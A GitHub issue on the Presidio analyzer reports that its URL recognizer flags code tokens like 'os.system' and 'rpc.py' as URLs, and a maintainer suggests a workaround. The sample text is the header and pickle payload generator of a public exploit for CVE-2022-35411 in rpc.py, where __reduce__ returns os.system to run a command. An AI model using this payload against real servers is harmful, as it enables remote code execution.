Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

UrlRecognizer detects many false positives when analyzing code snippets #1498

Open
gfrebello opened this issue Dec 12, 2024 · 1 comment
Open

Comments

@gfrebello
Copy link

gfrebello commented Dec 12, 2024

Describe the bug
The BASE_URL_REGEX pattern of presidio_analyzer.predefined_recognizers.url_recognizer.UrlRecognizer generates several false positives when analyzing text that contains code snippets, filenames, or any non-URL token in the format <foo>.<bar>. In particular, regex patterns like (?:sy), (?:mt), (?:py) etc. match with os.system (Python module), zeus.mtia.local (hostname), rpc.py (Python file) and others, causing unintended false positives like os.sy, zeus.mt, rpc.py, etc.

To Reproduce
Install presidio_analyzer and run this:

from presidio_analyzer import AnalyzerEngine

text = '''
# Exploit Title: - rpc.py: Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle
HOST = "zeus.mtia.local:65432"
HEADERS = {
"serializer": "pickle"
}
def generate_payload(cmd):
  class PickleRce(object):
    def __reduce__(self):
      import os
      return os.system, (cmd,)
  payload = pickle.dumps(PickleRce())
  print(payload)
  return payload
'''

analyzer = AnalyzerEngine()
results = analyzer.analyze(text=text, entities=['URL'], language='en')
piis = []
for result in results:
    pii = text[result.start:result.end]
    piis.append(pii)

print(piis)

Expected behavior
['https://github.com/abersheeran/rpc.py', 'https://github.com/abersheeran']

Actual behavior
['https://github.com/abersheeran/rpc.py', 'https://github.com/abersheeran', 'rpc.py', 'zeus.mt', 'os.sy']

Screenshots
UrlRecognizer.BASE_URL_REGEX:
Image

Additional context
If this behavior is intended, adding (?![a-z]) to the expression at least prevents false positives like os.system (see the screenshots below). Cases like rpc.py (Python file) and rpc.py (valid Paraguayan URL) don't seem to have a simple solution though.

Image
Image

@gfrebello gfrebello changed the title UrlRecognizer causes false positives when analyzing code snippets UrlRecognizer detects many false positives when analyzing code snippets Dec 12, 2024
@omri374
Copy link
Contributor

omri374 commented Dec 14, 2024

Thanks for raising this issue. Agree this isn't straightforward as website.ru is a valid URL which is similar to website.py.

One way to overcome this is to set the confidence threshold above 0.5, which is the current base URL pattern score. In case of a real URL, context words around the url text could help boost the score (but not in all cases).

If you have a suggestion for improvement, we'd be happy to review it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants